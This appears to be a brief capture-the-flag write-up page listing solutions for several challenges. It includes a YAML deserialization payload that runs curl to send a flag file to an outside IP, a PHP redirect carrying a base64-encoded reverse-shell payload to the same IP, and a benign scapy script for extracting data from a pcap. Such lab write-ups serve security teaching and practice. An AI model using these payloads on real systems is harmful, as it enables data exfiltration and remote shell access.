πͺARCENT Best Cyber Warrior 2023
Quick challenge writeups for the CTF to explain exploitation.
CyberCompose
!!python/object/apply:os.popen ['curl -X POST http://159.223.147.201/ --data "$(cat /app/RanDomflagN4m3.txt)"']Confuser
Intruder
<?php header('Location: http://127.0.0.1:5000/yaml/ISFweXRob24vb2JqZWN0L25ldzpXYXJuaW5nCnN0YXRlOgogIGV4dGVuZDogISFweXRob24vbmFtZTpleGVjCmxpc3RpdGVtczogJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKCIxNTkuMjIzLjE0Ny4yMDEiLDgwKSk7b3MuZHVwMihzLmZpbGVubygpLDApOyBvcy5kdXAyKHMuZmlsZW5vKCksMSk7b3MuZHVwMihzLmZpbGVubygpLDIpO2ltcG9ydCBwdHk7IHB0eS5zcGF3bigic2giKSc%3D'); ?>S7R34M5
from scapy.all import *
import sys
#take in file name from argument
file = sys.argv[1]
#open file
f = open(file, "r")
# Define the source and destination IP addresses
source_ip = "192.168.245.129"
destination_ip = "192.168.1.7"
# Define an array to store the data bytes
data_array = []
packets = rdpcap(file)
def process_packet(packet):
# find all UDP packets from 192.168.245.129 to 192.168.1.7 and get the data byte and add to array and print array
if packet.haslayer(IP) and packet.haslayer(UDP) and packet[IP].src == source_ip and packet[IP].dst == destination_ip:
data = packet[Raw].load
data_array.append(data)
# Process each packet in the pcap file
for packet in packets:
process_packet(packet)
# merge the array and print
data = b''.join(data_array)
print(str(data, 'utf-8'))LeakyPond
Initial Access
Priv Esc
SayingPlease
Last updated